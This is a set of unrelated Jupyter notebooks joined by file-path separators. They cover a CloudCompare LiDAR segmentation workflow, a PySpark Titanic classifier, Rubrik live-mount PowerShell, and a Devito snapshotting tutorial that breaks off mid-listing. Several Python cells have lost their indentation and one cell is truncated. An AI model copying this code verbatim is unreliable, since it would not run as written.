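# The division by 2 when counting `number_of_outputs` works because each segmented cloud is exported twice (once as .asc, once as .las). A toy check of that arithmetic with a temporary directory:

```python
import os
import tempfile

tmp = tempfile.mkdtemp()
for i in range(3):                  # pretend there are 3 segmented clouds
    for ext in ('.asc', '.las'):    # each exported in both formats
        open(os.path.join(tmp, 'cloud_{}{}'.format(i, ext)), 'w').close()

# Same expression as in the workflow above, applied to the toy folder
number_of_outputs = int(sum(len(files) for _, _, files in os.walk(tmp)) / 2)
print(number_of_outputs)  # 3
```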
# #### #2 Segmentation by connected components
# Parameters
octree_level = 11
min_point_per_component = 20
commande1 = 'CloudCompare -SILENT -C_EXPORT_FMT BIN -AUTO_SAVE off -NO_TIMESTAMP'
individual_outputs_filenames = {'Sources':'individual_sources','Deposits':'individual_deposits'}
for i in range(0,len(Extraction_folder)):
# Create individual clouds and store the result in a .bin file
commande = cc.open_file(commande1,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'AllClouds.bin',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'.bin')
# Merge all individual clouds
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'.bin')
cc.merge_clouds(commande)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_MERGED_0.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.las')
for i in range(0,len(Extraction_folder)):
df=pd.read_csv(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.asc',sep=',',header=0)
df = df.add_suffix('_3D')
df.to_csv(list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[0]+'_merged.asc',sep=',',header=True,index=False)
# Here, you have to open the individual clouds ".bin" file in CloudCompare to merge all the files and keep the index of all individual clouds. You can save the result in ".asc" and keep the column titles.
# IMPORTANT: Cloud #5590 has been removed in this study, as it was identified as resulting from an imperfect flight-line alignment.
# Now, we will add the suffix "_3D" to all scalar field names to keep them during the volume estimation workflow.
# ### #2 Volume estimation
# Compute Vertical-M3C2
params_file = 'Vertical_m3c2_params.txt'
filenames_Vm3C2 = {'pre_EQ_lidar':'LiDAR_2014', 'post_EQ_lidar':'LiDAR_2016_registered'}
osf.open_folder(workspace+workflow_folder)
for i in range(0,len(Extraction_folder)):
commande = cc.open_file(cc.open_file(cc.open_file(commande0,shift,workspace+Data_folder+filenames['pre_EQ_lidar']+'.laz'),shift,workspace+Data_folder+filenames['post_EQ_lidar']+'.laz'),shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.asc')
cc.m3c2(commande,params_file,workspace,Data_folder,filenames_Vm3C2)
os.rename(workspace+Data_folder+list(filenames.values())[0]+'_M3C2.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2.las')
number_of_outputs= {'Sources':1413,'Deposits':772}
individual_outputs_folder = {'Sources':'individual_sources/','Deposits':'individual_deposits/'}
# Extract all individual source and deposits from the scalar field 'Original cloud index'
for i in range(0,len(Extraction_folder)):
osf.open_folder(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i])
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2.las')
for ii in range(0,list(number_of_outputs.values())[i]):
cc.filter_SF(commande,indexSF=7,min=ii,max=ii)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2_FILTERED_['+str(ii)+'_'+str(ii)+'].las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]+'Cloud_'+str(ii)+'.las')
|
scripts/.ipynb_checkpoints/brouillon-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Word2vec
#
# In this notebook, I use word2vec to train distributed representations.
import gensim
import pandas as pd
# ## Phonological
with open('../../data/training/phonological/english.txt') as f:
training_corpus =
|
semrep/models/word2vec/word2vec.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from __future__ import print_function, division
import time
import os
import sys
import csv
from numpy import array
# +
spark_home = os.environ['SPARK_HOME']
sys.path.insert(0, os.path.join(spark_home, 'python'))
sys.path.insert(0, os.path.join(spark_home, 'python/lib/py4j-0.10.4-src.zip'))
from pyspark.sql import SparkSession
spark = SparkSession.builder.master("local") \
.appName("test") \
.enableHiveSupport() \
.getOrCreate()
sc = spark.sparkContext
# -
# ## Data
# https://www.kaggle.com/c/titanic/data
# !hadoop fs -put ../data/titanic* /data/
df_train = spark.read.csv("/data/titanic_train.csv", header=True)
df_test = spark.read.csv("/data/titanic_test.csv", header=True)
df_train.count()
df_test.count()
df_train
df_train.show()
df_train.printSchema()
# +
from pyspark.sql.functions import lit, col
df_train = df_train.withColumn('Mark',lit('train'))
df_test = (df_test.withColumn('Survived',lit(0))
.withColumn('Mark',lit('test')))
df_test = df_test[df_train.columns]
## Append Test data to Train data
df = df_train.unionAll(df_test)
# -
df
# Convert Age, SibSp, Parch, Fare to Numeric
df = (df.withColumn('Age',df['Age'].cast("double"))
.withColumn('SibSp',df['SibSp'].cast("double"))
.withColumn('Parch',df['Parch'].cast("double"))
.withColumn('Fare',df['Fare'].cast("double"))
.withColumn('Survived',df['Survived'].cast("double"))
)
df.printSchema()
df.count()
df.groupBy('mark').count().show()
# ## Impute missing Age and Fare with the Average
# +
numVars = ['Survived','Age','SibSp','Parch','Fare']
def countNull(df, var):
return df.where(df[var].isNull()).count()
missing = {var: countNull(df,var) for var in numVars}
# -
missing
age_mean = df.groupBy().mean('Age').first()[0]
fare_mean = df.groupBy().mean('Fare').first()[0]
df = df.na.fill({'Age':age_mean,'Fare':fare_mean, 'Parch':0, 'Sex':'male', 'Embarked': 'S'})
# +
missing = {var: countNull(df, var) for var in numVars}
missing
# +
## Impute missing Embark
df = df.na.fill({'Embarked': 'S'})
# -
df.show()
# # Extract Title from Name
# +
from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
## user-defined function to extract the title
## note: splitting on the first '.' keeps everything before it (surname included, e.g. "Braund, Mr")
getTitle = udf(lambda name: name.split('.')[0].strip(), StringType())
df = df.withColumn('Title', getTitle(df['Name']))
df.select('Name','Title').show(3)
# -
# ## Index categorical variable
df.select('Sex').show()
## index Sex variable
from pyspark.ml.feature import StringIndexer
si = StringIndexer(inputCol = 'Sex', outputCol = 'Sex_indexed')
df_indexed = si.fit(df).transform(df).drop('Sex').withColumnRenamed('Sex_indexed','Sex')
df_indexed.select('Sex').show(5)
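# What StringIndexer does is easy to mimic in plain Python (an illustrative sketch, not the Spark implementation): the most frequent label gets index 0.0, the next 1.0, and so on.

```python
from collections import Counter

def string_index(values):
    # most frequent value -> 0.0, next -> 1.0, ... (ties by first appearance)
    order = [v for v, _ in Counter(values).most_common()]
    mapping = {v: float(i) for i, v in enumerate(order)}
    return [mapping[v] for v in values], mapping

indexed, mapping = string_index(['male', 'female', 'male', 'male'])
print(mapping)   # {'male': 0.0, 'female': 1.0}
print(indexed)   # [0.0, 1.0, 0.0, 0.0]
```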
# +
## make use of pipeline to index all categorical variables
catVars = ['Pclass','Sex','Embarked','Title']
def indexer(df,col):
si = StringIndexer(inputCol = col, outputCol = col+'_indexed').fit(df)
return si
indexers = [indexer(df,col) for col in catVars]
from pyspark.ml import Pipeline
pipeline = Pipeline(stages = indexers)
df_indexed = pipeline.fit(df).transform(df)
df_indexed.select('Embarked','Embarked_indexed').show(3)
# -
# ## Convert to label/features format
catVarsIndexed = [i+'_indexed' for i in catVars]
featuresCol = numVars+catVarsIndexed
featuresCol.remove('Survived')
labelCol = ['Mark','Survived']
# +
from pyspark.sql import Row
from pyspark.ml.linalg import Vectors
row = Row('mark','label','features')
df_indexed = df_indexed[labelCol+featuresCol]
# +
# 0-mark, 1-label, 2-features
# map features to DenseVector
lf = df_indexed.rdd.map(lambda r: (row(r[0], r[1], Vectors.dense(r[2:])))).toDF()
# index label
lf.show(3)
# -
# convert numeric label to categorical, which is required by
# decisionTree and randomForest
lf = StringIndexer(inputCol = 'label',outputCol='index').fit(lf).transform(lf)
lf.show()
lf.groupBy('mark').count().show()
# +
train = lf.where(lf.mark =='train')
test = lf.where(lf.mark =='test')
# random split further to get train/validate
train,validate = train.randomSplit([0.7,0.3],seed =121)
# -
print('Train Data Number of Row: '+ str(train.count()))
print('Validate Data Number of Row: '+ str(validate.count()))
print('Test Data Number of Row: '+ str(test.count()))
train.select('index','features').rdd.take(5)
# # Apply Models from ML/MLLIB
# ## Logistic Regression
# +
from pyspark.ml.classification import LogisticRegression
# regPara: lasso regularisation parameter (L1)
lr = LogisticRegression(maxIter = 100, regParam = 0.05, labelCol='index').fit(train.select('index','features'))
# Evaluate model based on auc ROC(default for binary classification)
from pyspark.ml.evaluation import BinaryClassificationEvaluator
def testModel(model, validate = validate):
pred = model.transform(validate)
evaluator = BinaryClassificationEvaluator(labelCol = 'index')
return evaluator.evaluate(pred)
print ('AUC ROC of Logistic Regression model is: '+str(testModel(lr)))
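# For intuition, ROC AUC is the probability that a randomly chosen positive is scored above a randomly chosen negative. A small numpy sketch via the rank-sum (Mann-Whitney) identity; it ignores ties and is illustrative only, not the Spark evaluator:

```python
import numpy as np

def auc(labels, scores):
    order = np.argsort(scores)
    ranks = np.empty(len(scores))
    ranks[order] = np.arange(1, len(scores) + 1)   # 1-based ranks, no tie handling
    pos = labels == 1
    n_pos, n_neg = pos.sum(), (~pos).sum()
    # Mann-Whitney U statistic of the positives, normalised to [0, 1]
    return (ranks[pos].sum() - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)

y = np.array([0, 0, 1, 1])
s = np.array([0.1, 0.4, 0.35, 0.8])
print(auc(y, s))  # 0.75
```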
# +
from pyspark.ml.classification import DecisionTreeClassifier, RandomForestClassifier
dt = DecisionTreeClassifier(maxDepth = 10, labelCol ='index').fit(train)
rf = RandomForestClassifier(numTrees = 10, labelCol = 'index').fit(train)
# +
models = {'LogisticRegression':lr,
          'DecisionTree':dt,
'RandomForest':rf}
modelPerf = {k:testModel(v) for k,v in models.items()}
# -
modelPerf
|
spark_ml/3_data_cleaning_titanic_example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PowerShell
# name: powershell
# ---
# + [markdown] azdata_cell_guid="bf436523-0fd6-423d-88b7-9f346d226a93"
# # Live Mount a database
# Live mount allows for near instant recovery of a database. If a database restore/export normally takes hours, then live mounting a database will take a few minutes. Live Mount does a full recovery of a database to either the same SQL Server Instance with a different database name or another SQL Server Instance with the same or different database name. The recovery of the database is much faster, because Rubrik does not need to copy the contents of the backup from the Rubrik Cluster back to the SQL Server. All of the recovery work is done on the Rubrik cluster itself. Then the database files are presented to the SQL Server Instance via a secure SMB3 share that is only accessible by the machine the share is mounted to.
#
# Live Mounting a database is great for a lot of different use cases:
# - Object level recovery
# - Developer testing
# - DevOps Automation
# - Reporting databases
# - DBA Backup validation testing
# - Application smoke-test validation for database migrations
#
# A key parameter is RecoveryDateTime. All dates in Rubrik are stored in UTC format, and this parameter expects a fully qualified date and time in UTC, for example 2018-08-01T02:00:00.000Z. In the example below, we pull the latest recovery point that Rubrik knows about.
#
# ## Mount a database to a SQL Server
# ```ps
# $TargetSQLServerInstance = "am1-sql16-1"
# $LiveMountName = "Forward_LiveMount"
# $TargetInstance = Get-RubrikSQLInstance -ServerInstance $TargetSQLServerInstance
# $RubrikRequest = New-RubrikDatabaseMount -id $RubrikDatabase.id `
# -TargetInstanceId $TargetInstance.id `
# -MountedDatabaseName $LiveMountName `
# -recoveryDateTime (Get-date (Get-RubrikDatabase -id $RubrikDatabase.id).latestRecoveryPoint) `
# -Confirm:$false
# Get-RubrikRequest -id $RubrikRequest.id -Type mssql -WaitForCompletion
# ```
#
# ## Unmount a database from SQL Server
# ```ps
# $RubrikDatabaseMount = Get-RubrikDatabaseMount -MountedDatabaseName $LiveMountName -TargetInstanceId $TargetInstance.id
# $RubrikRequest = Remove-RubrikDatabaseMount -id $RubrikDatabaseMount.id -Confirm:$false
# ```
# ## Advanced Examples
# For more advanced examples of live mounting databases with Rubrik, see the scripts below, available on our [Github Repo](https://github.com/rubrikinc/rubrik-scripts-for-powershell):
#
# - [mass-livemount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/mass-livemount.ps1)
# - [invoke-MassLiveMount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/invoke-MassLiveMount.ps1)
# - [invoke-MassUnMount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/invoke-MassUnMount.ps1)
#
# + azdata_cell_guid="99d472e3-b512-4f00-b00c-78a44135961a" tags=[]
#Connect-Rubrik with an API Token
$Server = "amer1-rbk01.rubrikdemo.com"
$Token = "<KEY>"
Connect-Rubrik -Server $Server -Token $Token
# Get database information from Rubrik
$SourceSQLServerInstance = "am1-sql16-1"
$SourceDatabaseName = "AdventureWorks2016"
$RubrikDatabase = Get-RubrikDatabase -Name $SourceDatabaseName -ServerInstance $SourceSQLServerInstance
# + azdata_cell_guid="37735469-0d73-4630-9b7a-ece95a74a395" tags=[]
#Mount a database to a SQL Server
$TargetSQLServerInstance = "am1-sql16-1"
$LiveMountName = "Forward_LiveMount"
$TargetInstance = Get-RubrikSQLInstance -ServerInstance $TargetSQLServerInstance
$RubrikRequest = New-RubrikDatabaseMount -id $RubrikDatabase.id `
-TargetInstanceId $TargetInstance.id `
-MountedDatabaseName $LiveMountName `
-recoveryDateTime (Get-date (Get-RubrikDatabase -id $RubrikDatabase.id).latestRecoveryPoint) `
-Confirm:$false
Get-RubrikRequest -id $RubrikRequest.id -Type mssql -WaitForCompletion
# + azdata_cell_guid="0e73695c-ccbe-4743-b25c-65f11505b505" tags=[]
#Unmount a database from SQL Server
$RubrikDatabaseMount = Get-RubrikDatabaseMount -MountedDatabaseName $LiveMountName -TargetInstanceId $TargetInstance.id
$RubrikRequest = Remove-RubrikDatabaseMount -id $RubrikDatabaseMount.id -Confirm:$false
|
content/10_LiveMountADatabase.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Snapshotting with Devito using the `ConditionalDimension`
#
# This notebook introduces new Devito users (especially those with a C or Fortran background) to best practices for saving snapshots to disk as a binary float file.
#
# We start by presenting a naive approach, and then introduce a more efficient method, which exploits Devito's `ConditionalDimension`.
# # Initialize utilities
#NBVAL_IGNORE_OUTPUT
# %reset -f
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# # Problem Setup
# This tutorial is based on an example that has appeared in a [TLE tutorial](https://github.com/devitocodes/devito/blob/master/examples/seismic/tutorials/01_modelling.ipynb) (Louboutin et al., 2017), in which one shot is modeled over a 2-layer velocity model.
# +
# This cell sets up the problem that is already explained in the first TLE tutorial.
#NBVAL_IGNORE_OUTPUT
# #%%flake8
from examples.seismic import Receiver
from examples.seismic import RickerSource
from examples.seismic import Model, plot_velocity, TimeAxis
from devito import TimeFunction
from devito import Eq, solve
from devito import Operator
# Set velocity model
nx = 201
nz = 201
nb = 10
shape = (nx, nz)
spacing = (20., 20.)
origin = (0., 0.)
v = np.empty(shape, dtype=np.float32)
v[:, :int(nx/2)] = 2.0
v[:, int(nx/2):] = 2.5
model = Model(vp=v, origin=origin, shape=shape, spacing=spacing,
space_order=2, nbl=10)
# Set time range, source, source coordinates and receiver coordinates
t0 = 0. # Simulation starts at t=0
tn = 10000. # Simulation lasts tn milliseconds
dt = model.critical_dt # Time step from model grid spacing
time_range = TimeAxis(start=t0, stop=tn, step=dt)
nt = time_range.num # number of time steps
f0 = 0.010 # Source peak frequency is 10Hz (0.010 kHz)
src = RickerSource(
name='src',
grid=model.grid,
f0=f0,
time_range=time_range)
src.coordinates.data[0, :] = np.array(model.domain_size) * .5
src.coordinates.data[0, -1] = 20. # Depth is 20m
rec = Receiver(
name='rec',
grid=model.grid,
npoint=101,
time_range=time_range) # new
rec.coordinates.data[:, 0] = np.linspace(0, model.domain_size[0], num=101)
rec.coordinates.data[:, 1] = 20. # Depth is 20m
depth = rec.coordinates.data[:, 1] # Depth is 20m
plot_velocity(model, source=src.coordinates.data,
receiver=rec.coordinates.data[::4, :])
#Used for reshaping
vnx = nx+20
vnz = nz+20
# Set symbolics for the wavefield object `u`, setting save on all time steps
# (which can occupy a lot of memory), to later collect snapshots (naive method):
u = TimeFunction(name="u", grid=model.grid, time_order=2,
space_order=2, save=time_range.num)
# Set symbolics of the operator, source and receivers:
pde = model.m * u.dt2 - u.laplace + model.damp * u.dt
stencil = Eq(u.forward, solve(pde, u.forward))
src_term = src.inject(field=u.forward, expr=src * dt**2 / model.m,
offset=model.nbl)
rec_term = rec.interpolate(expr=u, offset=model.nbl)
op = Operator([stencil] + src_term + rec_term, subs=model.spacing_map)
# Run the operator for `(nt-2)` time steps:
op(time=nt-2, dt=model.critical_dt)
# -
# # Saving snaps to disk - naive approach
#
# We want to get equally spaced snaps from the `nt-2` saved in `u.data`. The user can then define the total number of snaps `nsnaps`, which determines a `factor` to divide `nt`.
nsnaps = 100
factor = round(u.shape[0] / nsnaps) # Get approx nsnaps, for any nt
ucopy = u.data.copy(order='C')
filename = "naivsnaps.bin"
file_u = open(filename, 'wb')
for it in range(0, u.shape[0], factor):
file_u.write(ucopy[it, :, :])
file_u.close()
# Checking `u.data` spaced by `factor` using matplotlib,
# +
#NBVAL_IGNORE_OUTPUT
plt.rcParams['figure.figsize'] = (20, 20) # Increases figure size
imcnt = 1 # Image counter for plotting
plot_num = 5 # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
plt.subplot(1, plot_num+1, imcnt+1)
imcnt = imcnt + 1
plt.imshow(np.transpose(u.data[i * factor, :, :]))
plt.show()
# -
# Or from the saved file:
#
# +
#NBVAL_IGNORE_OUTPUT
fobj = open("naivsnaps.bin", "rb")
snaps = np.fromfile(fobj, dtype=np.float32)
snaps = np.reshape(snaps, (nsnaps, vnx, vnz))  # reshape vector to matrix, Devito layout: nx first
fobj.close()
plt.rcParams['figure.figsize'] = (20, 20)  # Increases figure size
imcnt = 1  # Image counter for plotting
plot_num = 5  # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
    plt.subplot(1, plot_num+1, imcnt+1)
    imcnt = imcnt + 1
    plt.imshow(np.transpose(snaps[i, :, :]))
plt.show()
# -
# This C/FORTRAN way of saving snaps is clearly not optimal when using Devito; the wavefield object `u` is specified to save all snaps, and a memory copy is done at every `op` time step. Given that we don't want all the snaps saved, this process is wasteful; only the selected snapshots should be copied during execution.
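# As a rough illustration of the cost, the memory footprint of the two strategies can be estimated with plain Python arithmetic. The `nt` value below is an assumed placeholder (in the example above it comes from `time_range.num`); the grid sizes mirror the padded model (201 + 2*10 points per dimension):

```python
# Estimated memory footprint of saving every time step vs. only the snapshots.
# float32 wavefields take 4 bytes per value.
vnx, vnz = 221, 221
nt = 6000            # assumed time-step count; the real value is time_range.num
nsnaps = 100
bytes_per_value = 4  # np.float32

bytes_per_snap = vnx * vnz * bytes_per_value
naive_mb = nt * bytes_per_snap / 1024**2           # naive: save all nt steps
subsampled_mb = nsnaps * bytes_per_snap / 1024**2  # keep only nsnaps snapshots

print(f"naive: {naive_mb:.1f} MiB, subsampled: {subsampled_mb:.1f} MiB")
```

# The subsampled wavefield is smaller by a factor of `nt / nsnaps`, which is exactly the saving the Devito method in the next section achieves.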
#
#
# To address these issues, a better way to save snaps using Devito's capabilities is presented in the following section.
# # Saving snaps to disk - Devito method
#
# A better way to save snapshots to disk is to create a new `TimeFunction`, `usave`, whose time size is equal to
# `nsnaps`. There are 3 main differences from the previous code, flagged by `#Part 1`, `#Part 2` and `#Part 3`. After running the code, each part is explained in more detail.
# +
#NBVAL_IGNORE_OUTPUT
from devito import ConditionalDimension
nsnaps = 100 # desired number of equally spaced snaps
factor = round(nt / nsnaps) # subsequent calculated factor
print(f"factor is {factor}")
#Part 1 #############
time_subsampled = ConditionalDimension(
't_sub', parent=model.grid.time_dim, factor=factor)
usave = TimeFunction(name='usave', grid=model.grid, time_order=2, space_order=2,
save=(nt + factor - 1) // factor, time_dim=time_subsampled)
print(time_subsampled)
#####################
u = TimeFunction(name="u", grid=model.grid, time_order=2, space_order=2)
pde = model.m * u.dt2 - u.laplace + model.damp * u.dt
stencil = Eq(u.forward, solve(pde, u.forward))
src_term = src.inject(
field=u.forward,
expr=src * dt**2 / model.m,
offset=model.nbl)
rec_term = rec.interpolate(expr=u, offset=model.nbl)
#Part 2 #############
op1 = Operator([stencil] + src_term + rec_term,
subs=model.spacing_map) # usual operator
op2 = Operator([stencil] + src_term + [Eq(usave, u)] + rec_term,
subs=model.spacing_map) # operator with snapshots
op1(time=nt - 2, dt=model.critical_dt) # run only for comparison
op2(time=nt - 2, dt=model.critical_dt)
#####################
#Part 3 #############
print("Saving snaps file")
print("Dimensions: nz = {:d}, nx = {:d}".format(nz + 2 * nb, nx + 2 * nb))
filename = "snaps2.bin"
usave.data.tofile(filename)
#####################
# -
# As `usave.data` has the desired snaps, no extra variable copy is required. The snaps can then be visualized:
# +
#NBVAL_IGNORE_OUTPUT
fobj = open("snaps2.bin", "rb")
snaps = np.fromfile(fobj, dtype=np.float32)
snaps = np.reshape(snaps, (nsnaps, vnx, vnz))
fobj.close()
plt.rcParams['figure.figsize'] = (20, 20) # Increases figure size
imcnt = 1 # Image counter for plotting
plot_num = 5 # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
    plt.subplot(1, plot_num+1, imcnt+1)
    imcnt = imcnt + 1
    plt.imshow(np.transpose(snaps[i, :, :]))
plt.show()
# -
# ## About Part 1
#
# Here a subsampled version (`time_subsampled`) of the full time Dimension (`model.grid.time_dim`) is created with the `ConditionalDimension`. `time_subsampled` is then used to define an additional symbolic wavefield `usave`, which will store in `usave.data` only the predefined number of snapshots (see Part 2).
#
# Further insight on how `ConditionalDimension` works and its most common uses can be found in [the Devito documentation](https://www.devitoproject.org/devito/dimension.html#devito.types.dimension.ConditionalDimension). The following excerpt exemplifies subsampling of simple functions:
#
# Among the other things, ConditionalDimensions are indicated to implement
# Function subsampling. In the following example, an Operator evaluates the
# Function ``g`` and saves its content into ``f`` every ``factor=4`` iterations.
#
# >>> from devito import Dimension, ConditionalDimension, Function, Eq, Operator
# >>> size, factor = 16, 4
# >>> i = Dimension(name='i')
# >>> ci = ConditionalDimension(name='ci', parent=i, factor=factor)
# >>> g = Function(name='g', shape=(size,), dimensions=(i,))
# >>> f = Function(name='f', shape=(size/factor,), dimensions=(ci,))
# >>> op = Operator([Eq(g, 1), Eq(f, g)])
#
# The Operator generates the following for-loop (pseudocode)
# .. code-block:: C
# for (int i = i_m; i <= i_M; i += 1) {
# g[i] = 1;
# if (i%4 == 0) {
# f[i / 4] = g[i];
# }
# }
#
# From this excerpt we can see that the C code generated by `Operator` with the extra argument `Eq(f,g)` mainly corresponds to adding an `if` block on the optimized C-code, which saves the desired snapshots on `f`, from `g`, at the correct times. Following the same line of thought, in the following section the symbolic and C-generated code are compared, with and without snapshots.
#
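# The `save=(nt + factor - 1) // factor` size used for `usave` in Part 1 is just a ceiling division: it matches the number of loop iterations in which the generated `if (time % factor == 0)` branch fires. A quick plain-Python check (the `nt` and `factor` values below are illustrative, not the exact ones from the run above):

```python
# Count how often the snapshot branch `if (time % factor == 0)` would fire
# over nt iterations, and compare with the ceiling division used to size usave.
nt, factor = 2769, 60   # illustrative values

saved = sum(1 for time in range(nt) if time % factor == 0)
ceil_div = (nt + factor - 1) // factor

print(saved, ceil_div)  # the two counts agree
```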
# # About Part 2
#
# We then define `Operator`s `op1` (no snaps) and `op2` (with snaps). The only difference between the two is that `op2` has an extra symbolic equation `Eq(usave, u)`. Notice that even though `usave` and `u` have different Dimensions, Devito's symbolic interpreter understands it, because `usave`'s `time_dim` was defined through the `ConditionalDimension`.
#
# Below, we show relevant excerpts of the compiled `Operators`. As explained above, the main difference between the optimized C-code of `op1` and `op2` is the addition of an `if` block. For `op1`'s C code:
# ```c
# // #define's
# //...
#
# // declare dataobj struct
# //...
#
# // declare profiler struct
# //...
#
# int Kernel(struct dataobj *restrict damp_vec, const float dt, struct dataobj *restrict m_vec, const float o_x, const float o_y, struct dataobj *restrict rec_vec, struct dataobj *restrict rec_coords_vec, struct dataobj *restrict src_vec, struct dataobj *restrict src_coords_vec, struct dataobj *restrict u_vec, const int x_M, const int x_m, const int y_M, const int y_m, const int p_rec_M, const int p_rec_m, const int p_src_M, const int p_src_m, const int time_M, const int time_m, struct profiler * timers)
# {
# // ...
# // ...
#
# float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data;
# // ...
#
# for (int time = time_m, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3); time <= time_M; time += 1, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3))
# {
# struct timeval start_section0, end_section0;
# gettimeofday(&start_section0, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
# float r0 = 1.0e+4F*dt*m[x + 2][y + 2] + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1];
# u[t1][x + 2][y + 2] = 2.0e+4F*dt*m[x + 2][y + 2]*u[t0][x + 2][y + 2]/r0 - 1.0e+4F*dt*m[x + 2][y + 2]*u[t2][x + 2][y + 2]/r0 + 1.0e+2F*((dt*dt*dt)*u[t0][x + 1][y + 2]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 1]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 3]/r0 + (dt*dt*dt)*u[t0][x + 3][y + 2]/r0) + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1]*u[t2][x + 2][y + 2]/r0 - 4.0e+2F*dt*dt*dt*u[t0][x + 2][y + 2]/r0;
# }
# }
# gettimeofday(&end_section0, NULL);
# timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000;
# struct timeval start_section1, end_section1;
# gettimeofday(&start_section1, NULL);
# for (int p_src = p_src_m; p_src <= p_src_M; p_src += 1)
# {
# //source injection
# //...
# }
# gettimeofday(&end_section1, NULL);
# timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000;
# struct timeval start_section2, end_section2;
# gettimeofday(&start_section2, NULL);
# for (int p_rec = p_rec_m; p_rec <= p_rec_M; p_rec += 1)
# {
# //receivers interpolation
# //...
# }
# gettimeofday(&end_section2, NULL);
# timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000;
# }
# return 0;
# }
# ```
# `op2`'s C code (differences are highlighted by `//<<<<<<<<<<<<<<<<<<<<`):
# ```c
# // #define's
# //...
#
# // declare dataobj struct
# //...
#
# // declare profiler struct
# //...
#
# int Kernel(struct dataobj *restrict damp_vec, const float dt, struct dataobj *restrict m_vec, const float o_x, const float o_y, struct dataobj *restrict rec_vec, struct dataobj *restrict rec_coords_vec, struct dataobj *restrict src_vec, struct dataobj *restrict src_coords_vec, struct dataobj *restrict u_vec, struct dataobj *restrict usave_vec, const int x_M, const int x_m, const int y_M, const int y_m, const int p_rec_M, const int p_rec_m, const int p_src_M, const int p_src_m, const int time_M, const int time_m, struct profiler * timers)
# {
# // ...
# // ...
#
# float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<DECLARE USAVE<<<<<<<<<<<<<<<<<<<<<
# float (*restrict usave)[usave_vec->size[1]][usave_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[usave_vec->size[1]][usave_vec->size[2]]) usave_vec->data;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
# //flush denormal numbers...
#
# for (int time = time_m, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3); time <= time_M; time += 1, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3))
# {
# struct timeval start_section0, end_section0;
# gettimeofday(&start_section0, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
